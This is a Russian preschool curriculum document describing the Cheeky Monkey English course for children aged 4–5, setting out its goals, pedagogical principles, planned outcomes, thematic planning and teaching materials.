ПАРЦИАЛЬНАЯ ОБРАЗОВАТЕЛЬНАЯ ПРОГРАММА «Английский для дошкольников»
рабочая программа (средняя группа)

ПАРЦИАЛЬНАЯ ОБРАЗОВАТЕЛЬНАЯ ПРОГРАММА

Скачать:

ВложениеРазмер
Файл progr.in-yaz.docx427.75 КБ

Предварительный просмотр:

СОДЕРЖАНИЕ

ЦЕЛЕВОЙ РАЗДЕЛ

  1. Пояснительная записка
  2. Актуальность и педагогическая целесообразность программы
  3. Цель и задачи реализации программы
  4. Принципы и подходы к реализации программы
  5. Образовательные области, в рамках которых реализуется программа
  6. Планируемые результаты освоения программы

 

СОДЕРЖАТЕЛЬНЫЙ РАЗДЕЛ

  1. Учёт особенностей развития детей 4–5 лет в процессе обучения английскому языку
  2. Описание курса Cheeky Monkey
  3. Тематическое планирование образовательной деятельности в рамках курса Cheeky Monkey

 

ОРГАНИЗАЦИОННЫЙ РАЗДЕЛ

  1. Материально-техническое обеспечение курса Cheeky Monkey
  2. Время и сроки реализации программы
  3. Литература

 

ТЕМАТИЧЕСКОЕ ПЛАНИРОВАНИЕ

Тематическое планирование образовательной деятельности, реализуемой в рамках курса Cheeky Monkey 1

Формы контроля усвоения программы

ЦЕЛЕВОЙ РАЗДЕЛ

1.        Пояснительная записка

Парциальная программа адресована воспитателям, преподавателям и специалистам-педагогам, обучающим детей 4–5 лет английскому языку в дошкольных образовательных организациях, а также  в кружках, студиях и т.п.

Программа курса обучения английскому языку Cheeky Monkey (издательство «Русское слово») входит в Программно-методический комплекс дошкольного образования «Мозаичный ПАРК». Парциальная программа курса разработана в соответствии с Федеральным законом Российской Федерации № 273-ФЗ «Об образовании в Российской Федерации» и Федеральным государственным образовательным стандартом дошкольного образования (ФГОС ДО).

Курс обучения английскому языку Cheeky Monkey направлен на решение задач создания благоприятных условий для развития детей   в соответствии с их возрастными и индивидуальными особенностями и склонностями, развития инициативы, способностей и творческого потенциала каждого ребёнка как субъекта отношений с самим собой, другими детьми, взрослыми и миром.

Курс обучения дошкольников английскому языку Cheeky Monkey разработан преемственно по отношению к УМК «Английский язык» авторов Ю.А. Комаровой, И.В. Ларионовой и др. (издательство «Русское слово»), входящему в систему «Начальная инновационная школа», а также по отношению к другим системам начального общего образования. Основанием преемственности являются требования ФГОС ДО к результатам освоения программы, представленные в виде целевых ориентиров дошкольного образования.

Курс обучения дошкольников английскому языку Cheeky Monkey носит инновационный характер, так как в системе работы задействованы интегративно-дифференцированные методы и способы обучения детей английскому языку. Интегративные методы реализуются путём использования мультисредовой игровой интеракции и билингвальных сюжетно-ситуативных приёмов сотворчества, направленных на коммуникативно-личностное, познавательное, социально-регулятивное и художественно-эстетическое развитие. Дифференцированные методы реализуются через индивидуальный подход к ребёнку, осуществляемый в условиях коллективных форм обучения, что открывает возможности для  позитивной  социализации  дошкольника и его личностного развития.

Проводимые занятия по английскому языку согласно образовательному курсу Cheeky Monkey являются более гибкими (по сравнению с традиционными формами работ), разнообразными по целям и задачам, вариативными по формам и методам преподавания, насыщенными по использованию новейших технических средств. Примечательно, что в данном курсе всесторонне и полно реализованы принципы совместной деятельности педагога, родителей и детей.

2.        Актуальность и педагогическая целесообразность программы

Теорией и практикой образовательной деятельности доказано, что изучение иностранных языков в раннем детстве полезно и эффективно. Безусловно, это наилучшее время для начала обучения языкам, поскольку является активным сензитивным периодом в жизни подрастающего человека, и овладение иностранным языком в этом возрасте осуществляется достаточно быстро и эффективно. Дети дошкольного возраста отличаются особой чуткостью к языковым явлениям, у них появляется интерес к осмыслению своего речевого опыта, они легко и прочно запоминают небольшой по объему языковой материал и хорошо его воспроизводят. С возрастом эти благоприятные факторы теряют свою силу.

Следующая причина, которая позволяет этот возраст считать предпочтительным для занятий иностранным языком, связана с коммуникативными потребностями детей. В дошкольный период словарный запас ребёнка в родном языке чрезвычайно ограничен, так же как и его речевые потребности: сфер общения у маленького ребёнка меньше, чем у старшего, ему еще не приходится решать сложные коммуникативные задачи. А значит, овладевая иностранным языком, он не ощущает серьёзного разрыва между возможностями в родном и иностранном языке, и чувство успеха у него более яркое, чем у детей старшего возраста. В дошкольном возрасте у ребёнка ещё мало штампов речевого поведения, ему легко по-новому «кодировать» свои мысли, он не испытывает трудностей при вступлении в контакт на иностранном языке. Если система обучения иностранному языку построена грамотно, то успех в овладении иностранным языком 6 и создание необходимых предпосылок для дальнейшего усвоения любого языка обеспечены практически всем детям.

Важным аргументом в пользу овладения иностранными языками в дошкольном возрасте является доказанность того факта, что иноязычное обучение развивает умственные способности ребёнка и благотворно сказывается на его эмоциональном и нравственном совершенствовании, развитии внимания, памяти, воображения и образного мышления. Более того, овладение основами иноязычной речи направлено также на развитие любознательности и познавательной мотивации, формирование познавательных действий, индивидуальных интересов детей и развитие их творческой активности и общекоммуникативных способностей.

Последний факт является важным аргументом в пользу раннего овладения детьми дошкольного возраста иностранным языком. Дети изучают иностранный язык не только как новое средство общения, но и как средство приобщения к другой культуре. Это значит, что обучение иностранному языку приобретает поликультурный характер.

Таким образом, целесообразность раннего обучения иностранным языкам очевидна и в настоящее время не вызывает сомнения. Образовательная деятельность по овладению иностранным языком носит развивающий интегративный характер, а важным результатом подобного обучения является комплексный аксиологический образовательный эффект, достигаемый в познавательной, эмоциональной и практической сфере личности ребёнка.

3. Цель и задачи реализации программы

Цель: создание условий для овладения детьми английским языком как средством развития коммуникативных способностей детей, как инструментом их широкого взаимодействия с миром, обеспечения практики в разных видах деятельности и реализации творческой активности.

Задачи:

Образовательные:

• развивать интерес и любознательное отношение к тому, что связано со страной изучаемого языка;

• расширять представления ребёнка об окружающем мире посредством дополнительной лингвострановедческой информации;

• формировать представления о поликультурном мире и чувство осознания самих себя в нём;

• расширять кругозор дошкольников, формировать их когнитивную инициативу, пополнять их знания о сверстниках в стране изучаемого языка.

Развивающие: 

• развивать психические функции ребёнка (восприятие, внимание, языковая память, воображение, основы языкового мышления и др.) через процесс овладения иностранным языком;

• развивать специальные способности, необходимые для обучения иноязычному общению: фонематический слух, имитационные способности, способность к догадке и различению;

• способствовать становлению самостоятельности дошкольников и саморегуляции их собственных действий;

• развивать творческую активность учащихся и их речевую культуру.

        Воспитательные: 

• воспитывать у детей дошкольного возраста устойчивый интерес к изучению английского языка;

• формировать экологическую культуру и стремление к здоровому образу жизни;

• воспитывать средствами английского языка чувство патриотизма, толерантности и эмпатии;

• формировать уважительное отношение к людям, чувство товарищества и дружбы;

• развивать позитивные установки к различным видам труда и творчества;

• формировать готовность к обучению в школе.

Практические:

• формировать у дошкольников навыки и умения самостоятельного решения простейших коммуникативно-речевых задач на английском языке;

• научить детей понимать на слух несложную, вполне доступную по содержанию англоязычную речь;

• формировать навыки и умения приблизительно правильного с фонетической точки зрения оформления своей речи на английском языке;

• научить детей самостоятельно употреблять и понимать наиболее частотные несложные лексические единицы и грамматические структуры, необходимые для овладения коммуникативной тематикой.

  1. Принципы и подходы к реализации программы

Образовательный процесс, реализуемый в рамках курса Cheeky Monkey, строится с опорой на интегративный, индивидуально-дифференцированный и коммуникативный подходы.

Интегративный подход

Известно, что развитие ребёнка в дошкольный период как субъекта посильных видов деятельности должно быть системным, целостным и преемственным. Интегративный подход способен обеспечить названную целостность и предоставить возможность развивать в единстве познавательную, эмоциональную и практическую сферы личности ребёнка.

Следует отметить, что интегративный подход соотносится с возрастными особенностями дошкольников, поскольку детям данного возраста свойственно нерасчленённое восприятие мира. Использование данного подхода делает процесс обучения английскому языку оптимальным. Интеграция иностранного языка с другими предметами позволяет облегчить усвоение детьми иноязычного материала, а также предоставляет возможность параллельно приобрести знания по другим предметам.

Cheeky Monkey является комплексным образовательным курсом. В рамках названного курса интегративные связи представляют собой опору для полноценного восприятия и понимания новых знаний, формирования навыков и развития умений, а также позволяют обобщать и систематизировать имеющийся языковой и речевой опыт, обеспечивая полноту знания.

Интегративные связи способствуют интенсификации обучения иностранному языку, которая выражается в следующем: повышается интерес к изучению предмета (повышается коммуникативная мотивация); активизируется речемыслительная деятельность; совершенствуются речевые умения; формируется познавательная самостоятельность детей; расширяется кругозор обучаемых.

В содержание обучения английскому языку включены элементы содержания по другим дисциплинам, например предметам художественного цикла (рисование, аппликация и т.д.). Интегративный курс английского языка и художественного развития, безусловно, обладает большим потенциалом, поскольку позволяет сочетать изучение языка с выполнением предметной деятельности, в ходе чего происходит развитие художественных способностей через средства иностранного языка.

В содержание обучения английскому языку также интегрированы материалы естественно-научного характера. Так, например, расширяя представления детей о природе, педагог воспитывает у них гуманное отношение к живому, побуждает к эстетическим переживаниям, связанным с природой, решает задачи развития речи, овладения соответствующими практическими и познавательными умениями, учит отражать впечатления о природе в разнообразной изобразительной и игровой деятельности, а знания о потребностях животных и растений становятся основой для овладения способами ухода за ними.

Индивидуально-дифференцированный подход

Необходимость реализации индивидуально-дифференцированного подхода к процессу обучения английскому языку дошкольников связана с объективно существующими противоречиями между общими для всех детей образовательными целями, содержанием обучения, с одной стороны, и индивидуальными возможностями каждого ребёнка, с другой; а также между коллективной формой педагогического процесса и индивидуальным характером усвоения познавательного материала каждым дошкольником. Такого же рода объективные противоречия существуют между целями, содержанием, формами обучения и индивидуальными склонностями, способностями и интересами детей дошкольного возраста.

Индивидуально-дифференцированная система обучения английскому языку, предполагающая групповое обучение с учётом личностных особенностей детей, в полной мере представлена в курсе Cheeky Monkey. В названном курсе предложены вариативные способы педагогического воздействия на обучаемого с учётом его индивидуальных особенностей, реализуемых в ходе коллективного взаимодействия детей по овладению английским языком. Применение комплекса указанных мер способствует созданию условий для естественного индивидуального личностного роста каждого дошкольника в ходе овладения английским языком.

Следует отметить, что при изучении английского языка индивидуален не только процесс овладения (у каждого ребёнка разные способности, а следовательно, и свой темп продвижения), но и объект усвоения. Речь любого обучаемого независимо от возраста и языка индивидуальна, по крайней мере, по трём параметрам: сугубо индивидуален механизм мотивации речи (то, что волнует одного ребёнка, оставляет равнодушным другого); индивидуально содержание речевого высказывания (дети в речи выражают самих себя); наконец, индивидуален способ формулирования мысли (одна и та же мысль разными детьми выражается разными речевыми средствами). Для того чтобы ребёнок мог проявить свою индивидуальность, на занятиях действуют два правила: правило избыточности подачи материала и правило отсроченности результатов его усвоения. Это значит, что в рамках одного и того же упражнения детям всегда предоставляется право выбора, т.е. возможность выбрать те или иные речевые средства в соответствии со своими потребностями, возможностями, настроением и т.д.

Коммуникативный подход

Развитие речевой деятельности на английском языке детей дошкольного возраста является одной из важных задач, реализуемых в рамках курса Cheeky Monkey. Известно, что владение связной речью имеет большое значение для формирования личности ребёнка, его социализации, во многом определяет его дальнейшую успешность, в частности — на начальном этапе обучения в школе.

Коммуникативная деятельность направлена на решение задач, связанных с развитием общения детей и освоением всех компонентов устной речи, освоением культуры общения и этикета, воспитанием толерантности. Коммуникативная деятельность включается во 11 все виды детской активности, в ней находит отражение опыт, приобретаемый детьми в других видах деятельности.

Коммуникативный подход к процессу обучения английскому языку, реализуемый в рамках курса Cheeky Monkey, способствует более эффективному формированию у детей дошкольного возраста иноязычных навыков и умений, установлению между детьми положительных контактов, основанных на общих интересах к действиям с игрушками, предметами и на взаимной симпатии, развивает эмоциональную отзывчивость. Коммуникативные технологии помогают детям в освоении способов взаимодействия со сверстниками в игре, в повседневном общении и бытовой деятельности, помогают также объединяться в парной игре, вместе рассматривать картинки и пр.

Здесь же заметим, что речевая деятельность ребёнка дошкольного возраста направлена на удовлетворение его потребностей в эмоциональном общении и ориентирована на достижение коммуникативных целей. Материалы курса Cheeky Monkey выстроены таким образом, что в каждом отдельном случае детская речевая деятельность обусловлена коммуникативной ситуацией, которая, в свою очередь, выступает как стимул, вызывающий потребность в общении и побуждающий ребёнка к естественной речевой активности. Таким образом, в мотивированных для ребёнка ситуациях он учится общаться, активно усваивая коммуникативный материал.

В образовательной деятельности представленные выше подходы реализуются с опорой на принципы:

• принцип интегративности предполагает овладение дошкольниками способами общения на родном и иностранном языках на межпредметной и междеятельностной основе при условии чёткого определения интегративного базиса обучения, выявления интегративных связей на уровне целеполагания, содержания и технологии развивающего обучения. Организация обучения детей иностранному языку на интегративной основе способствует более гармоничному развитию личности дошкольников и формированию их готовности к школьному обучению;

• принцип личностно-развивающего и гуманистического характера взаимодействия взрослых и детей: в рамках обучения английскому языку происходит обогащение опыта сотрудничества ребёнка-дошкольника, а также наращивание у него опыта дружеских взаимоотношений со сверстниками и корректного взаимодействия со взрослыми;

• принцип формирования положительной самооценки у ребёнка предполагает, что в процессе овладения английским языком у детей происходит развитие уверенности в себе, осознания роста своих достижений, чувства собственного достоинства, стремления стать школьником;

• принцип воспитания и всестороннего развития в обучении позволяет развить у детей интерес к окружающему миру, сформировать познавательную любознательность, выработать трудолюбие, развить значимые навыки и умения (речевые, изобразительные, музыкальные, конструктивные и др.), необходимые для осуществления различных видов детской деятельности и т.д.;

• принцип положительного эмоционального фона обучения осуществляется путём создания атмосферы максимального раскрепощения, при которой ребёнок признаётся полноценным участником образовательных отношений;

• принцип научности и доступности обучения выражается в соблюдении научных позиций при отборе содержания обучения английскому языку и методов обучения, которые соответствуют возрастным особенностям детей дошкольного возраста, уровню их развития и индивидуальным особенностям;

• принцип игровой основы обучения способствует развитию у детей через использование сюжетно-ситуативных форм работы произвольного внимания, повышает мотивацию к деятельности, помогает в успешном запоминании иноязычного материала;

• принцип активности: каждый ребёнок является активным участ ником процесса обучения английскому языку, и каждый ребёнок вовлечён в интеллектуальную, эмоциональную, речевую активность, которая способна обеспечить благоприятные условия для развития и успешной социализации детей;

• принцип наглядности: данный принцип реализуется путём использования различных видов наглядности, например: картинок, фотографий, элементарных схем, игрушек, аудио- и видеоматериалов и т.д. Использование вариативных форм наглядности мобилизует психическую активность детей, вызывает интерес к занятиям, снижает утомление, облегчает весь процесс обучения.

• принцип опоры на родной язык предполагает использование родного языка в методически обоснованных ситуациях, в частности, при контроле понимания нового материала, при проведении лингвистических, социокультурных, лингвострановедческих и т.д. параллелей между родным и иностранным языками и культурами с целью установления общих закономерностей и отличий;

• принцип сознательности предполагает выполнение детьми осознаваемых операций с языком, которые выступают в качестве ори ентировочных опор учебных действий и которые способствуют элементарной систематизации усвоенного языкового материала; повышает интеллектуальный потенциал занятий английским языком;

• принцип культуросообразности: при обучении английскому языку происходит приобщение детей к социокультурным нормам, традициям своей и англоязычных стран; при обучении дошкольников используются аутентичные стихи, считалочки, рифмовки, народные песни и игры; применяются лингвострановедческие материалы, которые обогащают опыт ребёнка, расширяют его кругозор, способствуют развитию речевых навыков и умений, накоплению лексического запаса, а также вызывают интерес и потребность к дальнейшему изучению английского языка;

• принцип овладения иностранным языком через общение: на занятиях английского языка создаются условия общения, адекватные реальным, что обеспечивает успешное овладение речевыми умениями и их дальнейшее мотивированное и адекватное использование детьми в условиях реальной речевой деятельности; успешная реализация данного принципа во многом зависит от умения учителя создать благоприятный психологический климат и быть настоящим речевым партнёром;

• принцип концентричности в обучении предполагает повтор коммуникативной тематики на последующих этапах обучения; таким образом, усвоенный ранее детьми языковой, речевой и лингвострановедческий материал вовлекается впоследствии в другие коммуникативные темы и ситуации и прорабатывается на более высоком уровне сложности;

• принцип сюжетно-ситуативной организации учебного материала: иноязычный материал группируется вокруг той или иной игровой ситуации общения, которая входит структурным элементом в сквозной сюжет курса;

• принцип комплексной организации учебного материала реализуется путём объединения материала в тематические блоки (например, «Семья», «Еда», «Животные» и т.д.), причём лексикограмматический материал новой темы тренируется и закрепляется вместе с учебным материалом уже изученной темы; таким образом, в каждой последующей теме закрепляются лексические единицы и речевые образцы предыдущей и вводятся новые;

• принцип «минимакса» заключается в реализации технологических ориентиров, предполагающих введение минимального количества лексических и грамматических единиц и максимальную их тренировку на занятии;

• принцип функциональности реализуется путём отбора учебного материала согласно тем сферам коммуникации, темам и ситуациям, которые являются актуальными для дошкольников; названный принцип помогает сделать учебный процесс практико-направленным и мотивированным.

  1. Образовательные области, в рамках которых реализуется программа

Программа реализуется в следующих образовательных областях:

• социально-коммуникативное развитие,

• познавательное развитие,

• речевое развитие,

• художественно-эстетическое развитие,

• физическое развитие.

Изучение иностранного языка способствует более глубокому знакомству с другими культурами, пониманию межкультурных различий, развитию толерантности как черты характера, необходимой для формирования гармоничной целостной личности в современном поликультурном обществе. Национальное сознание, культура межнационального общения и взаимодействия закладываются с самого раннего возраста и являются составной частью воспитательно-образовательной работы с детьми.

Социально-коммуникативное развитие, осуществляемое в рамках курса английского языка Cheeky Monkey, направлено на усвоение норм и ценностей, принятых в обществе, включая моральные и нравственные ценности; развитие общения и взаимодействия ребёнка со взрослыми и сверстниками; становление самостоятельности, целенаправленности и саморегуляции собственных действий; развитие социального и эмоционального интеллекта, эмоциональной отзывчивости, сопереживания, формирование готовности к совместной деятельности со сверстниками, формирование уважительного отношения и чувства принадлежности к своей семье и к сообществу детей и взрослых; формирование позитивных установок к различным видам труда и творчества; формирование основ безопасного поведения в быту, социуме, природе.

Познавательное развитие, реализуемое средствами курса английского языка Cheeky Monkey, предполагает развитие интересов детей, любознательности и познавательной мотивации; формирование по знавательных действий, становление сознания; развитие воображения и творческой активности; формирование первичных представлений о себе, других людях, объектах окружающего мира, о свойствах и отношениях объектов окружающего мира (форме, цвете, размере, материале, звучании, ритме, темпе, количестве, числе, части и целом, пространстве и времени, движении и покое, причинах и следст виях и др.); формирование элементарных знаний о малой родине, Отечестве, странах изучаемого языка; овладение первичными представлениями о социокультурных ценностях нашего народа и народов других стран, многообразии стран и народов мира, о традициях и праздниках своей страны и стран изучаемого языка, о планете Земля как общем доме людей, об особенностях её природы.

Речевое развитие детей является ещё одной важной целевой установкой курса английского языка Cheeky Monkey. Изучая английский язык, дети овладевают иноязычной речью как новым средством общения; обогащают свой активный словарь; развивают связную, грамматически правильную диалогическую и монологическую речь как на родном, так и английском языке; овладевают звуковой и интонационной культурой речи, фонематическим слухом; формируют аудитивную аналитико-синтетическую способность как предпосылку последующего обучения грамоте.

 Художественно-эстетическое развитие, осуществляемое в рамках курса английского языка Cheeky Monkey, предполагает развитие основ ценностно-смыслового восприятия и понимания произведений искусства (словесного, музыкального, изобразительного), мира природы; становление эстетического отношения к окружающему миру; формирование элементарных представлений о видах искусства; восприятие музыки, художественной литературы, фольклора своей страны и страны изучаемого языка; стимулирование сопереживания персонажам художественных произведений; реализацию самостоятельной творческой деятельности детей и др.

Физическое развитие, реализуемое средствами курса английского языка Cheeky Monkey, включает приобретение опыта в различных видах двигательной деятельности детей, способствующих правильному формированию опорно-двигательной системы организма, развитию равновесия, координации движений, крупной и мелкой моторики обеих рук, а также с правильным, не наносящим ущерба организму, выполнением основных движений (ходьба, бег, мягкие прыжки, повороты в обе стороны); формирование начальных представлений о некоторых видах спорта, овладение подвижными играми с правилами; становление целенаправленности и саморегуляции в двигательной сфере; становление ценностей здорового образа жизни, овладение его элементарными нормами и правилами (в питании, двигательном режиме, при формировании полезных привычек и др.).

Программа ориентирована на активное освоение детьми 4–5 лет разнообразных умений (игровых, коммуникативных, художественно-изобразительных, трудовых и т.д.) и соответствует принципу развивающего обучения, целью которого является развитие ребёнка через осознание своих потребностей, возможностей и способностей.

  1. Планируемые результаты освоения программы

Планируемые результаты освоения программы Cheeky Monkey следующие.

Социальные отношения

Дети имеют представление о нравственных качествах людей, их проявлении в поступках и взаимоотношениях (доброта, справедливость, ответственность, уважение, честность, чувство собственного достоинства); умеют оценивать добрые поступки; имеют представление о дружбе, о поведении настоящих друзей. У детей развивается способность и готовность помогать тому, кому трудно. Дети учатся регулировать свою активность: учитывать права других детей, соблюдать очерёдность, проявлять терпение, не вступать в ссоры, проявлять настойчивость.

Культура поведения

Детьми усвоены базовые правила культуры общения со взрослыми и детьми (сверстниками и малышами), нормы этикета (культура поведения за столом, поведение в гостях, культурные нормы разговора и пр.), уяснены правила поведения в общественных местах, правила уличного движения.

Познавательные способности

У детей сформированы элементарные умения использовать разные способы познания: обследование объектов, установление связей между способом обследования и познаваемым свойством предмета, сравнение по разным основаниям, измерение, упорядочивание, классификация. Они способны отражать результаты познания в речи, на элементарном уровне рассуждать, пояснять, приводить примеры и аналогии. У детей сформированы средствами английского языка общее представление о родном городе и стране, заложены гражданско-патриотические чувства. Детям нравится узнавать о других странах и народах мира, используя при этом английский язык; у них сформировано понимание того, что люди из разных стран стремятся беречь Землю и дружить.

Общеречевые способности

У детей сформированы элементарные умения коллективного речевого взаимодействия при выполнении поручений и игровых заданий. Они умеют использовать в процессе общения со взрослыми и сверстниками логичную объяснительную речь, владеют основными формулами эмоционального взаимодействия с людьми в ситуациях приветствия и прощания. Дети стремятся подбирать точные слова для выражения мысли. Они имеют представление о различии литературных жанров: сказки, рассказа, загадки, пословицы, стихотворения, считалочки и т.д. Дети знакомы с книжной культурой, обладают базовыми представлениями о классической и современной детской литературе.

Готовность к обучению в школе

Дети обладают представленими о школе, школьниках, учителе; понимают важность соблюдения школьного режима; стремятся к познанию. У детей сформирован интерес к дальнейшему овладению английским языком в условиях школьного образования.

Владение английским языком

Дети усваивают за год обучения от 50–70 слов (дети средней группы) активно и пассивно, включая местоимения, предлоги, частицы и другие служебные слова. Помимо расширения вокабуляра, малыши овладевают несколькими основными грамматическими конструкциями. Дети активно усваивают в рамках изучаемой коммуникативной тематики повествовательные, вопросительные, отрицательные и восклицательные предложения, по типу которых они самостоятельно строят предложения, пользуясь имеющимся у них запасом лексики.

У дошкольников сформированы навыки и умения приблизительно правильного с фонетической точки зрения оформления своей речи на английском языке. У них развит фонетический слух, они чувствуют интонацию, с лёгкостью могут её воспроизвести. Достаточно хорошо развиты артикуляционные навыки, дети чётко дифференцируют звуки.

СОДЕРЖАТЕЛЬНЫЙ РАЗДЕЛ

  1. Учёт особенностей развития детей 4–5 лет в процессе обучения английскому языку

Данный возраст уникален для овладения иностранным языком. Здесь можно говорить о таких психических особенностях ребёнка, как пластичность природного механизма усвоения речи, быстрое запоминание языковой информации, интенсивное формирование познавательных процессов, способность анализировать и синтезировать речевые потоки на разных языках, дифференциация этих языков и средств выражения, а также особая способность к имитации и отсутствие языкового барьера. Ребята данного возраста обладают хорошим речевым слухом и цепкой языковой памятью. У них также хорошо развито эмоциональнообразное восприятие языка. Форма слова, его звуковая оболочка, складность и ритмичность речи, красота и выразительность звука для детей этого возраста зачастую важнее лексического значения и грамматической стройности. Слова привлекают их своим звучанием.

Что же касается коммуникабельности и наличия положительной установки, то дети-дошкольники в большинстве своём достаточно коммуникабельны и лишены тех многочисленных комплексов и зажимов, которые становятся психологическим барьером для многих взрослых в овладении иностранным языком как средством общения. Они любознательны, стремятся к активному познанию мира, причём именно в этом возрасте процесс непосредственного чувственного познания дополняется словесным.

В курсе обучения английскому языку Cheeky Monkey малышам предоставлен такой языковой и речевой материал, который даст им возможность сравнивать языковые явления родного и иностранного языков и делать собственные выводы, что сделает весь процесс обучения более эффективным.

Также важно подчеркнуть, что при овладении английским языком чрезвычайно важна активная мыслительная деятельность ребёнкадошкольника. Овладевая речью, он овладевает также и знаниями о предметах, признаках, действиях и отношениях, запечатлённых в соответствующих словах. При этом он не только приобретает знания, но и учится мыслить. Слово становится материальной оболочкой мысли, когда за каждым словом у ребёнка стоит образ предмета, который это слово обозначает. Если ребёнок слышит в речи взрослых или сам использует слова, за которыми не стоят образы, мыслительной деятельности не происходит.

В курсе обучения английскому языку Cheeky Monkey детям в первую очередь предлагается овладеть теми понятиями, с которыми они уже давно знакомы на родном языке и которые присутствовали в их личном опыте. Это сделано для того, чтобы дети чувствовали себя уверенно и понимали, о чём идёт речь.

После того как ребёнок начал уверенно использовать родной язык, он начинает иметь дело не только с предметами, которые он видит, но и с теми, которые в данный момент отсутствуют или которых не было в его личном опыте, но с понятиями о которых он уже знаком. В таком случае расширять кругозор ребёнка возможно с помощью художественных произведений и объяснений взрослого. В условиях обучения иностранному языку в семье или в дошкольной образовательной организации на основе материалов комплекса Cheeky Monkey широко могут быть использованы разнообразные песни, короткие рассказы и истории из жизни. С их помощью ребёнок не только изучает иностранный язык, но и познаёт окружающий мир.

Одной из важных задач курса Cheeky Monkey является то, что дошкольник должен не только усвоить множество слов и словосочетаний, входящих в лексический строй языка, но и научиться грамматически правильно на элементарном уровне строить свою речь. Этот фактор был принят во внимание при разработке комплекса упражнений, который нацелен на обучение детей не отдельным словам на иностранном языке, а употреблению этих слов в речи с учётом их парадигматических особенностей.

Обучая ребёнка иностранному языку, важно учитывать психологические особенности развития речи ребёнка на родном языке, присущие дошкольному возрасту. На дошкольном этапе развитие речи ребёнка связано с формированием у него логического мышления. Ребёнок переходит от простых предложений, в большинстве случаев ещё не связанных друг с другом, к сложным предложениям. Однако с семантической стороны речь ребёнка остаётся достаточно бедной, владение вокабуляром ограниченное. В целях обогащения вокабуляра и развития умений связной речи материалы комплекса Cheeky Monkey предлагают обучать детей как словам, так и речевым образцам на иностранном языке, на основе которых они смогут строить осмысленные высказывания. В комплексе предложены также образцы элементарных мини-текстов, которые позволяют учащимся конструировать высказывания по извест ным им моделям в соответствии с возникающими у них коммуникативными потребностями.

Общение дошкольников может осуществляться в игре (игровое общение) и по поводу игры или другой совместной деятельности. В первом случае у ребёнка проявляются игровые взаимоотношения, складывающиеся у него в соответствии с сюжетом игры. Во втором случае у детей возникают взаимоотношения партнёров, выполняющих общее дело. Общение, обеспечивающее данный тип взаимоотношений, реализуется в момент развития сюжета игры, обсуждения совместной работы.

В завершение отметим, что все вышеперечисленные психологопедагогические особенности обучения детей дошкольного возраста английскому языку были в полной мере учтены при разработке курса Cheeky Monkey, а именно были определены, соответствующим образом отобраны и отражены в учебных материалах сферы общения и коммуникативные намерения; выявлены языковые и речевые средства, необходимые детям для их эффективной социализации; разработаны адекватные целям и задачам педагогического процесса приёмы и методы овладения английским языком; привлечены оптимальные и методически корректные средства обучения.

  1. Описание курса Cheeky Monkey

Построение образовательного процесса на основе курса Cheeky Monkey обеспечивает вовлечённость каждого ребёнка в проводимое занятие, что, в свою очередь, гарантирует успех всему процессу обучения английскому языку. Немаловажным фактором вовлечённости ребёнка в образовательную деятельность является создание у него положительной установки познания, формирование интереса к жизни, миру и культуре разных стран, а также развитие у него коммуникабельности, желания и умения вступать в общение с другими людьми. Названные задачи продуктивно реализуются путём использования сюжетно-ориентированных материалов курса Cheeky Monkey.

Cheeky Monkey — это образовательный курс, в сюжетную основу которого положены жизненные события и приключения милой весёлой обезьянки по имени Чики. Вместе со своими друзьями — мальчиком Томом и девочкой Элли, которые впервые появились в первом уровне данного курса, Чики переживает разного рода приключения и встречает новых друзей. Чики помогает педагогу вести занятия и вместе с детьми участвует в играх.

Как уже указывалось, курс Cheeky Monkey отличает гибкость в подходах к обучению английскому языку, что позволяет его эффективно использовать в различных формах дошкольного образования и обучающих методиках. Насыщенность курса историями и песнями, как и постоянное присутствие на занятиях игрушечной обезьянки, делают процесс изучения английского языка чрезвычайно привлекательным для детей дошкольного возраста.

Cheeky Monkey 1 — первый уровень учебного курса, с помощью которого дети 4–5 лет совершают первые весёлые шаги в изучении английского языка. Важной задачей курса Cheeky Monkey 1 является первичное знакомство с английским языком и закрепление у детей желания его изучать. Детская мотивация формируется и поддерживается благодаря яркому и задорному персонажу, сверстнику детей — обезьянке Чики. Авторы знакомят детей со звучанием и ритмом английской речи посредством слушания историй и песен, формируют умения поведения на уроке английского языка благодаря соблюдению определённого порядка ведения занятия и вовлечению детей в инициативное выполнение занимательных заданий. Песни, истории, игры и задания, разработанные в соответствии с методом опоры на физические действия, являются основными типами упражнений в этом курсе. На первом уровне обучения от детей не требуется на каждом занятии работать с развивающим пособием. Основная задача — формирование умений аудирования и адекватного реагирования, к говорению же дети поощряются лишь на этапе их готовности к началу овладения этим умением.

  1. Тематическое планирование образовательной деятельности в рамках курса Cheeky Monkey

Тематическое планирование является важнейшей частью образовательного процесса. Тематическое планирование предназначено для выявления наиболее эффективных путей реализации образовательной, развивающей и воспитательной функций педагогического процесса в системе занятий по английскому языку дошкольников. Оно позволяет выстроить уроки в определённую систему, увидеть перспективу в работе, помогает заранее продумать дифференцированные задания для дошкольников, разработать дополнительные материалы, позволяющие реализовать индивидуально-дифференцированный подход к процессу обучения.

 Тематические планы по курсу Cheeky Monkey (авторы Ю.А. Комарова, К. Харпер, К. Медуэлл) составлены на основе требований, предусмотренных Федеральным государственным образовательным стандартом, и предполагают тематический и результативно-ориентированный подход к содержанию и структурированию данных планов.

Тематический план по уровню обучения составлен на весь учебный год и представляет собой планируемый образ обучения по всем разделам курса английского языка. Основной целью тематического плана является определение оптимального содержания занятий и расчёт необходимого для них времени.

Тематический план содержит следующие разделы:

1) наименование раздела развивающего пособия;

2) число часов, отводимых на их изучение;

3) образовательные цели каждого занятия;

4) активная лексика, используемая на занятии;

5) лексический материал для повторения;

6) лексические единицы и фразы, усваиваемые рецептивно;

7) фразы, используемые для ведения занятия;

8) средства обучения.

Тематический план является по своей сути рабочим инструментом преподавателя английского языка. Данный план может быть подвергнут незначительной корректировке в течение учебного года (по объективным и субъективным причинам), но он должен быть выполнен по окончании учебного года.

ОРГАНИЗАЦИОННЫЙ РАЗДЕЛ

  1. Материально-техническое обеспечение курса Cheeky Monkey

Основные дидактические материалы курса

Развивающее пособие

Развивающее пособие состоит из разделов, каждый из которых подразделяется на занятия. Первые занятия каждого раздела содержат сюжетную историю в картинках и различные задания, включая задания с использованием наклеек. Далее приводятся задания, выполнение которых предполагает раскрашивание, обведение по контуру, рисование, соединение линиями картинок, а также задания, стимулирующие познавательную активность дошкольников. Страницы пособия перфорированы, что позволяет аккуратно извлечь из книги страницу с заданием и дать её ребёнку. На обороте каждой страницы с заданием приводятся краткие методические указания на русском языке на тот случай, если у педагога нет возможности обратиться за подробными комментариями к методическому пособию. В конце развивающего пособия в качестве дополнительного дан материал, который можно использовать при подготовке праздников Хеллоуин и Рождество.

